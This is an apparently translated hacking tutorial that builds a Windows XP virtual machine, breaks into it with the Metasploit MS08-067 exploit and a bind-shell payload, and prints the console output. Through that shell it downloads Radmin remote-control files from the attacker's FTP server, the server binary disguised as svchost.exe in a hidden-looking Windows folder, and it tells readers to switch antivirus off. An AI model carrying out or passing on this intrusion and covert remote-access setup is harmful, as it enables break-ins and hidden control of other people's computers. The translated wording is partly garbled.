Any Windows XP (SP2,SP3).
Virtual Machine - Vmware.
Download and install a virtual machine Vmware.
Create a new machine in Vmware, click CTRL+N and follow the instructions,
then go to Edit => "Virtual Network Setting" and go to the tab "Host Virtual Adapter".
Click add and create the necessary number of virtual adapters. Then go to DHCP and delete from there all the adapters except, Wmnet1 and Wmnet8. Here you can click the Accept and OK, or go to the Host Virtual Network Mapping and configure each adapter to your ip, if you do not, they will be assigned automatically.
Go to the settings of virtual machine CTR + D, go to the tab "Enternet", select "Custop Specifnc: virtual network" and assign any interface you like, of course, except Wmnet1 and Wmnet8, I chose Vmnet2.
Now turn to the CD-ROM, put a tick in the Use ISO image, click the review and select the image from which you will install Windows, we can also install it from disk noting "Use physical drive", and selecting the appropriate drive.
Now run the virtual machine and click F12, if you have configured everything correctly, you get the setup screen.
Now we can do local network between the real and virtual PC.Necessary software:
FTP - server (Serv-U)
So, after installation, you must configure the network, between our real and Virtual PC. To do this, go to the properties of a virtual connection adapter, which you selected tab Enternet, my it is a Vmnet2.
IP address 192.168.1.3
Now load the virtual machine and also go into network connections and look at the properties of tcp / ip.
IP address 192.168.1.10
Now we put the FTP server on our real PC. Choose Serv-U, it is easy.
Creating a user should be without a password. Put FTP in 21 standard port, use the FTP protocol, too.Sample:
Radmin Viewer 3
Scan PC scanner X-Spider
We used to break into a vulnerability in the Server service (ms08_067). Run Metasploit 3 Web and when it is loaded in the browser write: 127.0.0.1:55555
use windows/smb/ms08_067_netapi; our exploit
set PAYLOAD generic/shell_bind_tcp ; choose stuffing
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; host victim
RHOST => 192.168.1.10
set LPORT 7777 ; local port
LPORT => 7777
set RPORT 445 ; remote port
RPORT => 445
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
Open a command prompt on the remote system.
(create a folder windows, folder helps)
cd c: \ windows
(connect to our PC)
User (192.168.1.3: (none)): kerny
(successful connection happens, go to c: \ kerny \ your FTP, there is radmin)
cd c: \ kerny \
drw-rw-rw-1 user group 0 Mar 2 20:10.
drw-rw-rw-1 user group 0 Mar 2 20:10 ..
-rw-rw-rw-1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw-1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw-1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw-1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw-1 user group 152576 Mar 2 20:10 svchost.exe
(put the files on the victim's PC in the folder windows \ helps)
get 111.bat c: \ windows \ helps \ 111.bat
get 111.reg c: \ windows \ helps \ 111.reg
get AdmDll.dll c: \ windows \ helps \ AdmDll.dll
get raddrv.dll c: \ windows \ helps \ raddrv.dll
get svchost.exe c: \ windows \ helps \ svchost.exe
(Logoff from our FTP)
(go to the folder, and check whether the downloaded files)
cd c: \ windows \ helps
-rw-rw-rw-1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw-1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw-1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw-1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw-1 user group 152576 Mar 2 20:12 svchost.exe
(set Radmin in the victim)
Now run Radmin Viewer and connect.Video + soft:
Important: Turn Antivirus off OR download on the virtual machine!!